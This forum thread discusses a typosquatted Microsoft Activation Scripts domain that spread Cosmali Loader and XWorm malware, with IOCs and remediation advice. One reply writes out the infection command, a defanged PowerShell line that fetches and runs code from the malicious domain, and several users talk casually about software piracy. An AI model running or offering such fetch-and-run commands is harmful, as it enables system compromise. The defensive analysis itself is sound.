Fake MAS Windows activation domain used to spread PowerShell malware

[Brownie2019]

Content source

https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/

A typosquatted domain impersonating the Microsoft Activation Scripts (MAS) tool was used to distribute malicious PowerShell scripts that infect Windows systems with the 'Cosmali Loader'.
BleepingComputer has found that multiple MAS users began reporting on Reddit [1, 2] yesterday that they received pop-up warnings on their systems about a Cosmali Loader infection.

Full Story:

Fake MAS Windows activation domain used to spread PowerShell malware

A typosquatted domain impersonating the Microsoft Activation Scripts (MAS) tool was used to distribute malicious PowerShell scripts that infect Windows systems with the 'Cosmali Loader'.

www.bleepingcomputer.com

 

[Bot]

Full Story:

Fake MAS Windows activation domain used to spread PowerShell malware

A typosquatted domain impersonating the Microsoft Activation Scripts (MAS) tool was used to distribute malicious PowerShell scripts that infect Windows systems with the 'Cosmali Loader'.

www.bleepingcomputer.com

This looks like a straightforward (and very effective) typosquatting campaign: a look‑alike domain was used to serve a malicious PowerShell payload to people trying to run MAS, leading to “Cosmali Loader” infections. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/))

What happened (high level)

• Users intended to use the MAS “get.activated.win” domain, but mistyped it as “get.activate[.]win” (missing the “d”). ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/))
• That typo domain served malicious PowerShell, and affected users started seeing “Cosmali Loader” warning popups. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/))
• Per the reporting, Cosmali Loader has been associated with follow-on payloads like cryptominers and the XWorm RAT (remote access trojan). ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/))

If someone ran the wrong command/domain
I can’t safely tell from a screenshot or a popup alone whether a specific machine is infected, but if the mistyped domain was executed in PowerShell, it should be treated as a likely compromise and handled accordingly. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/))

• Immediately disconnect the PC from the network (Wi‑Fi/Ethernet) to limit further remote access/exfiltration.
• From a clean device, change passwords for email, banking, Microsoft account, and any password manager; revoke active sessions where possible; enable MFA.
• Preserve what you must (documents/photos only). Avoid backing up executables/scripts from the potentially infected system.
• Best-practice remediation: do a clean Windows reinstall from known-good media. With loader/RAT-style threats, “cleaning” isn’t always something you can trust 100%. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/))
• After reinstall, update Windows fully, update browsers, and re-install apps from official sources only.

If they want to confirm/triage before wiping

• Run a full scan with Microsoft Defender (including an Offline scan if available) and a reputable second opinion scanner (e.g., Malwarebytes).
• Check for suspicious persistence with Sysinternals tools like Autoruns and Process Explorer (scheduled tasks, Run keys, odd PowerShell child processes, unusual services).
• If they want guided cleanup, have them post in the Malware Removal section with proper diagnostic logs (e.g., FRST) so trained helpers can review what’s actually on the system.

Prevention takeaway
This is a good real-world reminder that piping remote scripts into an elevated shell is high-risk—typosquatting turns a one-character mistake into code execution. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/))

 

[Divergent]

The infection vector relies entirely on user error (typos) during the execution of a command-line script.

Typosquatting Vector

Legitimate Domain

get.activated.win

(Note the "d")

Malicious Domain

get.activate[.]win

(Missing the "d")

Infection Chain

User launches PowerShell as Administrator.

User types the command using the fake domain

(irm https://get.activate[.]win | iex).

The malicious server delivers a PowerShell script that downloads the Cosmali Loader.

Payloads

The loader deploys XWorm (Remote Access Trojan) for persistent access and data exfiltration, along with potential cryptomining modules.

Unusual Indicator (Grey-Hat Intervention)

Some victims have reported seeing a popup message stating,

"You have been infected by a malware called 'cosmali loader'...".

This message appears to have been pushed by a security researcher who compromised the attackers' insecure Command & Control (C2) panel to warn victims.

Indicators of Compromise (IOCs)

Network Indicators

URL: hxxps[:]//get[.]activate[.]win

Domain: get[.]activate[.]win

Behavioral Indicators

Messages warning of "Cosmali Loader" infection.

Unexpected CPU/GPU spikes due to background mining.

Unrecognized PowerShell instances or processes masquerading as system tasks (check Task Manager details).

Remediation & Recommendations

If you or a user executed the command with the typo, the system must be treated as fully compromised (RAT infection).

Unplug the Ethernet cable or disable Wi-Fi immediately to sever the attacker's connection to the XWorm RAT.

Assessment

Check Task Manager for high-resource PowerShell processes.

Check Startup Apps and Task Scheduler for unrecognized entries created recently.

Containment & Recovery

Because XWorm is a RAT that grants attackers full control (including the ability to install further persistence), a full wipe and clean reinstall of Windows is the only guaranteed remediation.

Change Passwords: From a different, clean device, change all passwords for accounts logged in on the infected machine (Email, Banking, Microsoft Account).

Prevention

Always copy commands directly from the official repository rather than typing them from memory.

(GitHub: massgravel/Microsoft-Activation-Scripts)

Verify the URL character-by-character before pressing Enter in an administrative terminal.

 

[Parkinsond]

Detected by MD

 

[TairikuOkami]

Honestly, people, buying Starbucks for $10 and not willing to pay $2 for licence, deserve to be hacked. They most likely do not tip either.

 

[Parkinsond]

Honestly, people, buying Starbucks for $10 and not willing to pay $2 for licence, deserve to be hacked. They most likely do not tip either.

View attachment 294792

It's a matter of principle than money

 

[TairikuOkami]

It's a matter of principle than money

Well Windows can be used without activating. But I get it, I used to pirate Adobe Suite to open a simple PDF, Microsoft Office to open txt. Eventually I realized it, why ... ?!

 

[Parkinsond]

I used to pirate Adobe Suite to open a simple PDF, Microsoft Office to open txt.

Don't, it's illegal

 

[Virtuoso]

People have to be very careless to get infected by this. A simple google search "Microsoft Activation Scripts" brings the official website and github as the top two links:

Microsoft Activation Scripts | MAS

An open-source Windows and Office activator featuring HWID, Ohook, TSforge, and Online KMS activation methods, along with advanced troubleshooting.

massgrave.dev

GitHub - massgravel/Microsoft-Activation-Scripts: Open-source Windows and Office activator featuring HWID, Ohook, TSforge, and Online KMS activation methods, along with advanced troubleshooting.

Open-source Windows and Office activator featuring HWID, Ohook, TSforge, and Online KMS activation methods, along with advanced troubleshooting. - massgravel/Microsoft-Activation-Scripts

github.com

 

[Zero Knowledge]

Honestly, people, buying Starbucks for $10 and not willing to pay $2 for licence, deserve to be hacked. They most likely do not tip either.

View attachment 294792

Yeah but you have to admit Frappuccino's are awesome. The days of using KMS and alike are gone, just buy a cheap $10 Win 11 Pro license from the grey market.

 

[Parkinsond]

One more fake MAS Windows activation domain

VirusTotal

VirusTotal

www.virustotal.com